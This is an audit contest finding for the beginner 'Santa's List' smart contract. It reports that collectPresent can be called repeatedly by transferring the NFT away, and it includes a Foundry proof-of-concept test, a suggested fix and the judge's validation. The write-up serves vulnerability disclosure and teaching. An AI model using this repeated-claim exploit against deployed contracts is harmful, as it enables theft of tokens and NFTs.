First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

User can call collectPresent as many times as they want

praise03

Summary

Due to insufficient validation in collectPresent function a user can claim Santa's NFTs or Tokens multiple times

Vulnerability Details

function testCanCollectPresentIfAlreadyCollected() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
// 0 is the expected tokenId in this case
santasList.transferFrom(user, address(2), 0);
santasList.collectPresent();
}

In the above poc, a user can pass the ```` if (balanceOf(msg.sender) > 0) validation and call thecollectPresent``` function as many times as possible by simply transferring the claimed NFT to a desired address after each claim.

Impact

User can claim an infinite amout of tokens and NFTs

Tools Used

Manual Review

Recommendations

Possible solution: Introduce a mapping that tracks if a user has successfully claimed rewards once and use that mapping as a validation in the collectPresent function.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.